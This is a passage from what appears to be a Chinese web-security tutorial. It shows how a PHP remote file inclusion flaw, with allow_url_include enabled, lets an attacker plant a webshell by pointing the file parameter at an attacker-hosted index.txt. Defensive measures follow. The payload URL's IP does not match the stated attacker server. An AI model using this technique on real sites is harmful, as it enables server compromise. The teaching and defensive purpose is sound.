2、PHP遠(yuǎn)程文件包含漏洞獲得網(wǎng)站W(wǎng)ebShell

同樣還是采用相同的服務(wù)器代碼，其中PHP配置文件中，allow＿url＿fopen和allow＿url＿include兩個參數(shù)都必須是ON的狀態(tài)。

目標(biāo)服務(wù)器地址：192．168．20．35

攻擊者遠(yuǎn)程服務(wù)器：192．168．210．102

在攻擊者個人服務(wù)器上，放置了一個惡意文件（index．txt），如下：

該文件可以向目標(biāo)服務(wù)器上創(chuàng)建一個hack．php腳本文件，并向其中寫入一句話木馬（已被Base64加密），這里要注意的是惡意文件不能是php可解析的擴展名，也就是不能以php結(jié)尾。

攻擊者通過遠(yuǎn)程文件包含漏洞，觸發(fā)該文件（在file參數(shù)處寫入http：／／192．168．210．35／index．txt即可），如下：

然后攻擊者就可以通過連接工具，遠(yuǎn)程連接木馬并獲得網(wǎng)站W(wǎng)ebShell

防御方案

1、設(shè)置白名單

代碼在進行文件包含時，如果文件名可以確定，可以設(shè)置白名單對傳入的參數(shù)進行比較。

2、過濾危險字符

由于Include／Require可以對PHP Wrapper形式的地址進行包含執(zhí)行（需要配置php．ini），在Linux環(huán)境中可以通過”．．／．．／”的形式進行目錄繞過，所以需要判斷文件名稱是否為合法的PHP文件。

3、設(shè)置文件目錄

PHP配置文件中有open＿basedir選項可以設(shè)置用戶需要執(zhí)行的文件目錄，如果設(shè)置目錄的話，PHP僅僅在該目錄內(nèi)搜索文件。

4、關(guān)閉危險配置

PHP配置中的allow＿url＿include選項如果打開，PHP會通過Include／Require進行遠(yuǎn)程文件包含，由于遠(yuǎn)程文件的不可信任性及不確定性，在開發(fā)中禁止打開此選項，PHP默認(rèn)是關(guān)閉的。

5、提升安全開發(fā)意識

任意文件包含漏洞的主要出現(xiàn)在能夠解析處理腳本文件的函數(shù)上，沒有對輸入的變量進行過濾，導(dǎo)致任意文件包含，進而導(dǎo)致惡意代碼執(zhí)行。在開發(fā)處理這類功能函數(shù)上，一定要遵循編程規(guī)范；在代碼核心處，對變量進行過濾限制，設(shè)置文件路徑或者白名單，避免執(zhí)行任意文件包含。